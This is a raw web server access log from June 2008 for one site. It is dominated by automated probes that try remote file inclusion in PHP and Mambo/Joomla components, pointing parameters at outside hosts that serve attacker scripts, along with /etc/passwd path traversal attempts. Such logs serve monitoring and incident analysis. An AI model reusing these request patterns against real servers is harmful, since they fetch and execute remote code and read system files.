217.22.228.144 - - [09/Jun/2008:10:45:34 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:45:34 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:45:35 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:45:36 -0700] "GET /logs/index.php?p=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
82.194.82.172 - - [09/Jun/2008:10:45:42 -0700] "GET /index.php?p=/../../../../../../../../etc/passwd HTTP/1.1" 200 16827 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:45:46 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:45:47 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:45:47 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.144.143.180 - - [09/Jun/2008:10:46:01 -0700] "GET /logs/access_080312.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://agenciafederaldebotes.com/~prueba/includes/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.117.159 - - [09/Jun/2008:10:46:34 -0700] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://webraiders.com/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.117.159 - - [09/Jun/2008:10:46:34 -0700] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://webraiders.com/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.55.90.2 - - [09/Jun/2008:10:46:35 -0700] "GET /logs/access_080420.log/senetman/html/index.php?page=http://www.linknetcrew.com/code/mc22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.82.9.53 - - [09/Jun/2008:10:46:35 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 196608 "http://www.st-owners.com/forums/showthread.php?t=42712" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
80.93.56.80 - - [09/Jun/2008:10:46:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.degreeoferror.com/comics/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:46:42 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:46:42 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:46:42 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.82.9.53 - - [09/Jun/2008:10:46:48 -0700] "GET /blog/wp-content/uploads/mvi_0037.avi HTTP/1.1" 200 1638400 "http://www.st-owners.com/forums/showthread.php?t=42712" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:46:50 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:46:51 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:46:51 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:46:58 -0700] "GET /logs/access_080322.log/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:46:59 -0700] "GET /logs/access_080322.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:47:02 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:02 -0700] "GET /index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 200 16871 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:47:02 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:02 -0700] "GET /errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:47:03 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:03 -0700] "GET /logs/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:03 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:47:09 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:47:10 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:11 -0700] "GET /logs/access_080428.log/index.php?canal=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [09/Jun/2008:10:47:11 -0700] "GET /logs/access_080428.log/errors.php?error=http://hotel682.server4you.de/include/limits/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:47:14 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:47:14 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:47:14 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:47:25 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:47:29 -0700] "GET /logs/access_080325.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.189 - - [09/Jun/2008:10:47:37 -0700] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:47:58 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:47:58 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:47:58 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:48:05 -0700] "GET /logs/access_080212.log/myevent.php?myevent_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:48:05 -0700] "GET /myevent.php?myevent_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:48:05 -0700] "GET /logs/myevent.php?myevent_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:48:13 -0700] "GET /logs/access_080120.log/myevent.php?myevent_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:48:40 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:48:41 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:48:45 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:48:46 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:48:46 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:49:08 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:10:49:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.227.65.79 - - [09/Jun/2008:10:49:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:49:31 -0700] "GET /logs/access_080219.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:49:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:49:31 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:49:41 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:49:42 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:49:42 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:49:43 -0700] "GET /logs/?error/index.php?error=http://scc-team.co.cc/id.txt??? HTTP/1.1" 200 51131 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:49:46 -0700] "GET /?error/index.php?error=http://scc-team.co.cc/id.txt??? HTTP/1.1" 200 16829 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:49:55 -0700] "GET /logs/?error/index.php?error=http://scc-team.co.cc/id.txt??? HTTP/1.1" 200 51131 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.217.240 - - [09/Jun/2008:10:49:58 -0700] "GET /?error/index.php?error=http://scc-team.co.cc/id.txt??? HTTP/1.1" 200 16829 "-" "libwww-perl/5.803" "www.dmulk.com"
220.162.238.35 - - [09/Jun/2008:10:49:59 -0700] "GET /logs/access_080429.log//administrator/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://bjork.name.md/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.218.234.146 - - [09/Jun/2008:10:50:03 -0700] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://kiliclub.com/tmp/cid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.154.69 - - [09/Jun/2008:10:50:21 -0700] "GET /logs/access_080429.log//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.7-miles.com/media/buddy_icons/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.71.170.173 - - [09/Jun/2008:10:50:53 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:50:58 -0700] "GET /logs/access_080217.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:50:58 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:50:59 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:51:06 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:10:51:13 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:10:51:13 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:10:51:13 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [09/Jun/2008:10:51:13 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:51:16 -0700] "GET /logs/index.php?inc=http://boos.freetzi.com/inject/boos? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:51:18 -0700] "GET /logs/access_080326.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:51:18 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.189.26.170 - - [09/Jun/2008:10:51:19 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:51:19 -0700] "GET /index.php?inc=http://boos.freetzi.com/inject/boos? HTTP/1.1" 200 16817 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:51:20 -0700] "GET /logs/access_080203.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:04 -0700] "GET /logs/access_080217.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:04 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:05 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:08 -0700] "GET /logs/access_080203.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:36 -0700] "GET /logs/access_080217.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:36 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:52:37 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:52:39 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:52:39 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:52:40 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:20 -0700] "GET /logs/access.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:53:20 -0700] "GET /logs/access_080308.log//update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:53:21 -0700] "GET //update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:53:21 -0700] "GET /logs//update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:53:23 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:53:24 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [09/Jun/2008:10:53:24 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:26 -0700] "GET /logs/access_080228.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:27 -0700] "GET /errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:27 -0700] "GET /logs/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:29 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.104.78.250 - - [09/Jun/2008:10:53:31 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:10:53:36 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.122.36.7 - - [09/Jun/2008:10:53:40 -0700] "GET /logs/access_080312.log/newspublish/include.php?path[docroot]=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.22.228.144 - - [09/Jun/2008:10:53:49 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:10:53:53 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:10:53:57 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.130.174 - - [09/Jun/2008:10:53:57 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:10:54:07 -0700] "GET /logs/rgboard/include/bbs.lib.inc.php?site_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
72.47.201.117 - - [09/Jun/2008:10:54:07 -0700] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:54:35 -0700] "GET /logs//update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [09/Jun/2008:10:54:36 -0700] "GET //update/update5.php?lang=http://rehab.ru/images/stories/dop3-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.119 - - [09/Jun/2008:10:54:40 -0700] "GET /logs//MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
